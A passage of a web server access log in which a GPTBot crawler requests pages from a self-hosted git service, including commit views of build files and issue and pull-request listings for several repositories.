(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10977] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 38632] [Gzip 14.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&state=all&type=all" [Client 74.7.227.38] [Length 10127] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=all&type=all" -[17/Feb/2026:18:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9951] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:18:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" -[17/Feb/2026:18:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10101] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:18:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11124] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11879] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" -[17/Feb/2026:18:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10139] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:18:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9962] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" -[17/Feb/2026:18:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:18:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md?display=rendered" [Client 74.7.227.38] [Length 14281] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:18:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&state=all&type=all" -[17/Feb/2026:18:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16059] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2f__pycache__%2fnaver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 20828] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" -[17/Feb/2026:18:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2f__pycache__%2fapi_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 20831] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" -[17/Feb/2026:18:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&state=all&type=all" [Client 74.7.227.38] [Length 10120] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&state=all&type=all" [Client 74.7.227.38] [Length 10117] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=closed&type=all" -[17/Feb/2026:18:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=closed&type=all" -[17/Feb/2026:18:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11902] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" -[17/Feb/2026:18:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:18:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=source" [Client 74.7.227.38] [Length 12957] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:18:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:19:14 +0000] - 200 200 - GET https 